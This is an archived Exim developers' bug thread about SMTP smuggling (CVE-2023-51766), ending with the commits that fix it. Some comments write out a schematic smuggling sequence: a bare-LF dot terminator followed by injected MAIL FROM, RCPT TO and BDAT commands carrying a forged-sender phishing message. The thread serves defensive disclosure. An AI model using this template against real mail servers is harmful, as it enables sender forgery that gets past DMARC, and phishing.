Mailing List Archive

https://bugs.exim.org/show_bug.cgi?id=3063

Viktor Dukhovni <viktor1dane@dukhovni.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
CC| |viktor1dane@dukhovni.org

--- Comment #1 from Viktor Dukhovni <viktor1dane@dukhovni.org> ---
Does Exim enforce pipelining conformance by default?

That is, what is the default behaviour of Exim when an SMTP client expedites
some data before receiving a reply to a command (e.g. *DATA*) that should be
the *last* in a pipeline group?

Also, I should note that (as specified in RFC1830) BDAT is NOT the last command
in a pipeline group, and so Exim will accept two messages via a transaction of
the form:

MAIL FROM:<sender>
RCPT TO:<nobody>
DATA
From: Some Sender <sender>
To: Discarded Rcpt <nobody>
Subject: ...

<Some Message>
<LF>.<LF>
MAIL FROM:<forged-sender>
RCPT TO:<real-rcpt>
BDAT <length> LAST
From: Forged Sender <forged-sender>
To: Real Rcpt <real-rcpt>
Subject: Wire all your assets to me

<Phishing attack>
QUIT

It is sadly legal to pipeline any number of messages without any pauses with
BDAT. So provided the upstream system does not support CHUNKING, and treats
non-standard line endings (<LF>.<LF> or <LF>.<CR><LF>) as normal message
content to be sent verbatim, the SMTP smuggling scenario will work with that
system as the sending and Exim as the receiving MTA.

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #2 from Jeremy Harris <jgh146exb@wizmail.org> ---
(In reply to Viktor Dukhovni from comment #1)
> Does Exim enforce pipelining conformance by default?

In general yes, but specifically for the 354 "DATA go-ahead", not
by default. It's possible to induce one.

I could see some value in a change to always enforce.

> That is, what is the default behaviour of Exim when an SMTP client expedites

> Also, I should note that (as specified in RFC1830) BDAT is NOT the last
> command in a pipeline group, and so Exim will accept two messages via a
> transaction of the form:
>
> MAIL FROM:<sender>
> RCPT TO:<nobody>
> DATA

Um, that was DATA and not BDAT.

> From: Some Sender <sender>
> To: Discarded Rcpt <nobody>
> Subject: ...
>
> <Some Message>
> <LF>.<LF>

and IF that gets treated as the dot closing off data, such that the
following are taken as commands for a further message:

> MAIL FROM:<forged-sender>
> RCPT TO:<real-rcpt>
> BDAT <length> LAST
> From: Forged Sender <forged-sender>
> To: Real Rcpt <real-rcpt>
> Subject: Wire all your assets to me
>
> <Phishing attack>
> QUIT

... that "phishing attack" could just as easily have been sent
as a sole message. It will still be subject to all the same
Access Control List operations, either way.

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #3 from Viktor Dukhovni <viktor1dane@dukhovni.org> ---

(In reply to Jeremy Harris from comment #2)
> (In reply to Viktor Dukhovni from comment #1)
> > Does Exim enforce pipelining conformance by default?
>
> In general yes, but specifically for the 354 "DATA go-ahead", not
> by default. It's possible to induce one.
>
> I could see some value in a change to always enforce.

That would likely be prudent.


> > Also, I should note that (as specified in RFC1830) BDAT is NOT the last
> > command in a pipeline group, and so Exim will accept two messages via a
> > transaction of the form:
> >
> > MAIL FROM:<sender>
> > RCPT TO:<nobody>
> > DATA
>
> Um, that was DATA and not BDAT.

That's DELIBERATE. The BDAT in question is in the BODY of the upstream message
(below), preceded by <LF>.<LF>. We need DATA from the upstream system to make
some variant of <CRLF>.<CRLF> be end-of-message, but then its SMTP smuggling
payload can use BDAT to bypass any pipelining enforcement.

>
> > From: Some Sender <sender>
> > To: Discarded Rcpt <nobody>
> > Subject: ...
> >
> > <Some Message>
> > <LF>.<LF>
>
> and IF that gets treated as the dot closing off data, such that the
> following are taken as commands for a further message:
>
> > MAIL FROM:<forged-sender>
> > RCPT TO:<real-rcpt>
> > BDAT <length> LAST
> > From: Forged Sender <forged-sender>
> > To: Real Rcpt <real-rcpt>
> > Subject: Wire all your assets to me
> >
> > <Phishing attack>
> > QUIT
>
> ... that "phishing attack" could just as easily have been sent
> as a sole message. It will still be subject to all the same
> Access Control List operations, either way.

But the scenario in question assumes that the victim of forgery has DMARC, and
that the sending system would normally restrict the alleged "From:" address (as
is the typical case for submission via public email providers, hosting many
customer domains, including perhaps their own).

In this attack scenario, the sending system is unaware that there's a second
message in the body of the first, and the alignment of "From:" with the sender
credentials is not enforced, but SPF-based DMARC checks still pass...

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

https://bugs.exim.org/show_bug.cgi?id=3063

Jeremy Harris <jgh146exb@wizmail.org> changed:

What |Removed |Added
----------------------------------------------------------------------------
Status|NEW |ASSIGNED
OS|Linux |All
Assignee|unallocated@exim.org |jgh146exb@wizmail.org
Hardware|x86 |All
Target Milestone|Exim 4.97 |Exim 4.98

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #4 from Jeremy Harris <jgh146exb@wizmail.org> ---
https://nvd.nist.gov/vuln/detail/CVE-2023-51766

git master: cf1376206284 & 5bb786d5ad56 address this.
5bb7 has a dependency on 4596719398f6 (which is only coding-style changes;
not strictly part of the fixes).

Interested parties capable of building from git are invited to do so;
these commits are not in a release package from the Exim project at this time.

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/

https://bugs.exim.org/show_bug.cgi?id=3063

--- Comment #5 from Jeremy Harris <jgh146exb@wizmail.org> ---
I was was wrong about the lack of synch check for DATA. There has always
been one, so the one added in cf1376 is not needed (but will do no harm).

--
You are receiving this mail because:
You are on the CC list for the bug.

--
## subscription configuration (requires account):
## https://lists.exim.org/mailman3/postorius/lists/exim-dev.lists.exim.org/
## unsubscribe (doesn't require an account):
## exim-dev-unsubscribe@lists.exim.org
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/